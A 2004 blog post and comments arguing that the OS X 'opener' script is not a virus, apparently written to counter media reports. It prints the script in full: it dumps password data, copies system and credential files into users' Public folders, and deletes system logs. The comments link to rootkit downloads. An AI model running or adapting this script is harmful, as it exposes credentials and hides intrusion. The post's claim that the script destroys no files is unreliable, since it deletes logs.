opener: fake virus or spyware on OSX
I hesitated to post about that subject, but after seing all crapy details posted, relayed by media I decided to provide more details to show that is not a virus, not a spyware just a script targeting dummies and warez downloaders.
Let’s start from the beginning. As you may have noticed already, I’m some kind of dummy when it comes to computers and I tried to find a clear explanation about virus. So I went to [url=http://computer.howstuffworks.com/virus2.htm]How things works[/url], and I’ve found that “A computer virus must piggyback on top of some other program or document in order to get executed. Once it is running, it is then able to infect other programs or documents”.
So here is the evil code for “Opener”
“AVE THIS AS A TEXT FILE CALLED opener
#! /bin/sh
chmod 777 /etc/hostconfig
chflags nouchg /etc/hostconfig
mv /etc/hostconfig /etc/hostconfigold.old
cp /Library/StartupItems/opener/hostconfig /etc/hostconfig
cp -R /Library/ApplePasswordServer /.info/Library/ApplePasswordServer
cp /Library/WebServer/users /.info/Library/WebServer/users
cp /System/Library/CoreServices/SystemVersion.plist /.infoSystem/Library/CoreServices/SystemVersion.plist
cp -R /private/var/db /.info/private/var/db
cd /.info
nidump passwd . > .nidump.txt
nidump passwd / > .nidump2.txt
chmod -R 777 /.info
cd /Users
find . -maxdepth 2 -name “Public” -type d -exec sudo cp -R /.info ‘{}/.info’ \;
rm -Rf /private/var/log/
rm -Rf /Library/Logs/ ”
Haven’t you noticed something? #! /bin/sh ? Does it sound familiar to some of you? If not it #! /bin/sh is an Unix shell scripting language. For windows users, it’s that has the .bat file, dos scripts on Windows. That’s the virus, a unix shell script? It seems like the cream of cream of IT journalists such as [url=mailto:damian@itweb.co.za]Damian Clarkso[/url], [url=http://software.silicon.com/malware/0,3800003100,39125245,00.htm]Munir Kotadia[/url], [url=http://www.eweek.com/article2/0,1759,1682846,00.asp]Ian Betteridge[/url] should spend more time on site such has [url=computer.howstuffworks.com]How computer stuffs works[/url].
Why it’s not a virus?
-It doesn’t self propagate.
-It doesn’t use any exploits such as buffer over flow.
-It doesn’t use any shellcode.
-It does’t infected/destroy any files.
-It doesn’t use any security weakness
please feel free to add more on that list!
0 thoughts on “opener: fake virus or spyware on OSX”
Leave a Reply
You must be logged in to post a comment.
Filed under: Apple - @ October 26, 2004 3:35 pm
here’s the real code for opener ( http://freaky.staticusers.net/ugboard/viewtopic.php?t=10712&start=120&sid=d21270b46d24664177238b539b4b4495 ). Virus no, trojan maybe, it does replicate itself.
ok how about a rootkit then. If not then it’s definately part of a rootkit at least:
http://packetstormsecurity.org/UNIX/penetration/rootkits/osxrk-0.2.1.tbz
not even a trojan, a trojan requieing admin rights isn’t a really one:-)
Thanks Mac-Geek for point the original source/url.
Another rootkit for OS X. this one is just a proof of concept.
oops
http://neil.slampt.net/
finally interesting rootkit 😉